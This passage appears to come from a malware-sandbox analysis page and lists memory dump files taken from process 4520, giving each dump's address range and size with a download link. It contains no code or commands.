memory/4520-19-0x0000000006520000-0x000000000653E000-memory.dmp

Filesize
120KB

Download
memory/4520-1-0x000000007512E000-0x000000007512F000-memory.dmp

Filesize
4KB

Download
memory/4520-2-0x0000000002F20000-0x0000000002F56000-memory.dmp

Filesize
216KB

Download
memory/4520-23-0x00000000077F0000-0x000000000780A000-memory.dmp

Filesize
104KB

Download
memory/4520-50-0x0000000005250000-0x0000000005258000-memory.dmp

Filesize
32KB

Download
memory/4520-52-0x0000000007920000-0x00000000079B6000-memory.dmp

Filesize
600KB

Download
memory/4520-53-0x00000000078B0000-0x00000000078D2000-memory.dmp

Filesize
136KB

Download
memory/4520-54-0x0000000008A60000-0x0000000009004000-memory.dmp

Filesize
5.6MB

Download
memory/4520-8-0x0000000005740000-0x00000000057A6000-memory.dmp

Filesize
408KB

Download
memory/4520-56-0x0000000075120000-0x00000000758D0000-memory.dmp

Filesize
7.7MB

Download
memory/4520-57-0x000000007512E000-0x000000007512F000-memory.dmp

Filesize
4KB

Download
memory/4520-58-0x0000000075120000-0x00000000758D0000-memory.dmp

Filesize
7.7MB

Download
memory/4520-7-0x00000000056D0000-0x0000000005736000-memory.dmp

Filesize
408KB

Download
memory/4520-60-0x0000000075120000-0x00000000758D0000-memory.dmp

Filesize
7.7MB

Download
memory/4520-4-0x00000000057B0000-0x0000000005DD8000-memory.dmp

Filesize
6.2MB

Download
memory/4520-68-0x0000000075120000-0x00000000758D0000-memory.dmp

Filesize
7.7MB

Download